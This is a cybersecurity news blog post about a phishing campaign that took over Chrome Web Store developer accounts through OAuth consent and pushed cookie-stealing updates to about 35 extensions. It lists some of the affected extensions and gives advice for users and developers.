Massive Phishing Campaign Hits Chrome Extensions

A recent large-scale phishing campaign has shaken cybersecurity, compromising at least 35 Google Chrome extensions. These extensions, collectively used by approximately 2.6 million users, were injected with malicious code, exposing sensitive user data to theft. This article delves into the specifics of the attack, its implications, and the steps users can take to protect themselves.

How the Attack Unfolded

Deceptive Emails Target Developers

Early investigations revealed that the attackers used phishing emails to deceive Chrome extension developers. As official notifications from Google Chrome Web Store Developer Support, these emails warned of alleged compliance violations or metadata discrepancies. Unsuspecting developers who clicked on these emails were redirected to a convincing, yet fraudulent, Google login page for an application named “Privacy Policy Extension.”

When developers granted access, the attackers obtained OAuth permissions over their Chrome Web Store accounts. This access enabled the hackers to bypass multi-factor authentication measures and upload tampered versions of the affected extensions directly to the Chrome Web Store. These malicious updates were then distributed to users automatically.

Targeting Popular Extensions

The compromised extensions spanned various categories, including Virtual Private Network (VPN) tools, AI-powered browser integrations, and productivity applications. Among the targeted extensions were “AI Assistant,” “VPNCity,” “Reader Mode,” and “Web Mirror,” along with 31 other tools. Security researchers have noted that the campaign may have started as early as March 2024, with some of the attacker’s domains registered and tested months in advance.

The Malicious Payload

Extracting Sensitive Data

The injected malicious code was designed to extract user session tokens, cookies, and login credentials. Social media accounts were particularly concerned, especially those with access to Facebook Ads dashboards. Corporate accounts with advertising budgets became prime targets, with attackers seeking to exploit their resources for financial gain.

Command and Control Mechanisms

The malicious JavaScript files contained hard-coded command and control (C2) domains. These domains allowed the attackers to download additional configurations remotely and exfiltrate user data. The stolen cookies and session tokens were sent to attacker-controlled servers, enabling unauthorized access to victim accounts without requiring passwords.

Documented Proofs of Concept

Several proofs of concept demonstrated how the compromised extensions operated. Once activated, the extensions send user session details or cookies to the C2 servers. This enabled attackers to take over accounts, impersonate victims, and carry out malicious activities undetected.

Incident Disclosures and Affected Chrome Extensions

Early Detection by Cyberhaven

Cyberhaven, a California-based data protection company, was among the first to uncover the breach. On Christmas Eve, the company reported that a phishing attack had compromised an Employee’s credentials. This allowed the attackers to publish a malicious version of Cyberhaven’s Chrome extension (version 24.10.4).

List of Compromised Chrome Extensions

The following are some of the affected Chrome Extensions:

AI Assistant: Removed from the Chrome Web Store.
VPNCity: Status not yet addressed.
Reader Mode: Multiple versions were affected, and some were removed.
Web Mirror: Remains compromised.
ChatGPT for Google Meet: Removed from the store.
Internxt VPN: Addressed with a new update.

Investigations indicate that the total number of compromised extensions could exceed the currently confirmed 35 as researchers uncover additional subdomains linked to the attackers.

Broader Implications

Threat to Corporate Security

The campaign’s focus on corporate accounts underscores the growing sophistication of phishing attacks. By targeting extensions used for business purposes, attackers could access high-value assets, including advertising budgets, sensitive communications, and proprietary data.

Risks to Everyday Users

Compromise of widely used extensions like VPN tools and productivity add-ons poses significant risks for individual users. Stolen cookies and session tokens can lead to identity theft, financial fraud, and unauthorized access to private accounts.

Recommendations for Users and Developers

For Users

Uninstall Compromised Extensions: Check for and remove any extensions from the affected list.
Reset Passwords: Update passwords for all accounts, especially those linked to compromised extensions.
Review Permissions: Regularly audit the permissions granted to your browser extensions.
Monitor Activity: Monitor unusual activity in personal and business accounts.
Update Browsers and Plugins: Ensure your browser and all extensions are updated to their latest versions.

For Developers

Enable Robust Security Checks: Implement thorough security measures, including monitoring for unusual account activity.
Beware of Phishing Attempts: Be cautious when receiving emails that claim to be from official sources.
Strengthen Authentication: Use additional layers of security, such as hardware-based authentication keys.
Validate Updates: Regularly review and validate updates before publishing them to the Chrome Web Store.
Educate Teams: Provide training to developers and employees on recognizing phishing threats.

Evolution of the Attack

Increasing Sophistication

The primary attack vector relied on convincing phishing emails. These messages mimicked official Google communication, warning developers of metadata issues or compliance violations. By exploiting trust and urgency, the attackers compromised multiple accounts.

Expanding Reach

Although initial reports identified 16 compromised extensions, the number quickly grew to 35 as investigations continued. The attackers’ ability to adapt and scale their operations highlights the need for enhanced vigilance within the developer community.

Lessons Learned

Importance of Multi-Layered Security

While multi-factor authentication (MFA) is a critical security measure, this campaign demonstrates that it can be bypassed when attackers gain OAuth permissions. Developers and users alike must adopt additional safeguards to protect their accounts.

Need for Proactive Monitoring

Organizations must prioritize proactive monitoring of their digital assets. Detecting anomalies early can help mitigate the impact of such breaches.

Conclusion

This massive phishing campaign serves as a stark reminder of the evolving tactics employed by cybercriminals. With over 2.6 million users affected, the breach highlights vulnerabilities in the Chrome Web Store ecosystem and underscores the importance of maintaining robust security practices. Users and developers must remain vigilant, take immediate action to mitigate risks and stay informed about emerging threats. By adopting a proactive approach, we can collectively reduce the impact of such attacks and safeguard our digital lives.

For More:
https://cybersecuritynews.com/35-google-chrome-extensions-hacked/

Share this post :

Hoplon Infosec

Latest Post

FBI Seized $1M Crypto from BlackSuit Ransomware: A Major Disruption-but the Threat Lingers

September 6, 2025

Are You Making These Huge Wi-Fi Security Mistakes?

September 5, 2025

10 Important Tips For Creating a Strong Password